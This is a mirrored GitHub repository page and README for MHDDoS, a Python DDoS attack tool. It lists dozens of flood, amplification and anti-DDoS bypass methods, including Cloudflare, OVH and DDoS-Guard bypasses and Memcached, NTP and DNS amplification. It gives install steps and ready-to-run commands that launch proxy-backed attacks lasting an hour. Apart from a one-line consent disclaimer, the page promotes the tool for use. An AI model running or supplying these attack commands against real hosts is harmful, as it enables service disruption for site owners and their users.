mirror of
https://github.com/MatrixTM/MHDDoS.git
synced 2024-11-16 11:42:42 +08:00
Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods
amazon-bypassattackauto-proxybypasscloudflarecloudflare-bypassddosddos-attack-scriptddos-attack-toolsddos-attacksddos-scriptddos-toolddosguard-bypassdosfloodhacking-toollayer4minecraftbotovh-bypass
305f783236
Check bombardier exists, explain commands |
||
---|---|---|
.github | ||
files | ||
.gitignore | ||
BOMBARDIER.md | ||
config.json | ||
Dockerfile | ||
LICENSE | ||
README.md | ||
requirements.txt | ||
start.py |
MHDDoS - DDoS Attack Script With 40 Methods
(Programming Language - Python 3)
Please Don't Attack websites without the owners consent.
Features And Methods
-
💣 Layer7
- GET | GET Flood
- POST | POST Flood
- OVH | Bypass OVH
- STRESS | Send HTTP Packet With High Byte
- DYN | A New Method With Random SubDomain
- SLOW | Slowloris Old Method of DDoS
- HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD
- NULL | Null UserAgent and ...
- COOKIE | Random Cookie PHP 'if (isset($_COOKIE))'
- PPS | Only 'GET / HTTP/1.1\r\n\r\n'
- EVEN | GET Method with more header
- GSB | Google Project Shield Bypass
- DGB | DDoS Guard Bypass
- AVB | Arvan Cloud Bypass
- BOT | Like Google bot
- APACHE | Apache Expliot
- XMLRPC | WP XMLRPC expliot (add /xmlrpc.php)
- CFB | CloudFlare Bypass
- CFBUAM | CloudFlare Under Attack Mode Bypass
- BYPASS | Bypass Normal AntiDDoS
- BOMB | Bypass with [codesenberg/bombardier
-
🧨 Layer4:
- TCP | TCP Flood Bypass
- UDP | UDP Flood Bypass
- SYN | SYN Flood
- VSE | Send VSE Protocol
- MEM | Memcached Amplification
- NTP | NTP Amplification
- MINECRAFT | Minecraft Status Ping Protocol
- DNS | DNS Amplification
- CHAR | Chargen Amplification
- ARD | Apple Remote Desktop Amplification
- RDP | Remote Desktop Protocol Amplification
-
⚙️ Tools - Run With
python3 start.py tools
- 🌟 CFIP | Find Real IP Address Of Websites Powered By Cloudflare
- 🔪 DNS | Show DNS Records Of Sites
- 📍 TSSRV | TeamSpeak SRV Resolver
- ⚠ PING | PING Servers
- 📌 CHECK | Check If Websites Status
- 😎 DSTAT | That Shows Bytes Received, bytes Sent and their amount
-
🎩 Other
- ❌ STOP | STOP All Attacks
- 🌠 TOOLS | Console Tools
- 👑 HELP | Show Usage Script
Issues ?
- Telegram : https://t.me/DD0SChat
- Discord : MH_ProDev#2681
- GitHub
Like the project? Leave a star on the repository!
Downloads
You can download it from GitHub Releases
Getting Started
Requirements
Optional
Videos
- Aparat: https://www.aparat.com/v/bHcP9
- YouTube : Coming soon...
Toturial
- Aprat : https://aparat.com/v/XPn5Z
- YouTube : https://youtu.be/mZilAOkLKK8
Clone and Install Script
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt
Launch Script
Proxy Type | Value |
---|---|
All Proxy | 0 |
HTTP | 1 |
SOCKS4 | 4 |
SOCKS5 | 5 |
- Layer7 (Website):
# Running bypass attack from 101 threads,
# with socks 5, 100 requests per proxy (connection), for 3600 seconds
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 proxy.txt 100 3600
- Layer4 (Server/Home):
# Running udp attack from 100 threads,
# with socks 5, 100 requests per proxy (connection), for 3600 seconds
python start.py udp 1.1.1.1:53 100 3600 socks5.txt 5
python start.py dns 1.1.1.1:53 100 3600 socks5.txt 5 dns.txt
- Debug Mode (L4/L7):
python start.py bypass https://example.com 5 101 socks5.txt 100 3600 true
python start.py udp 1.1.1.1:53 100 3600 socks5.txt 5
- Tools/Help:
python start.py tools
python start.py help
💰 Donation Links: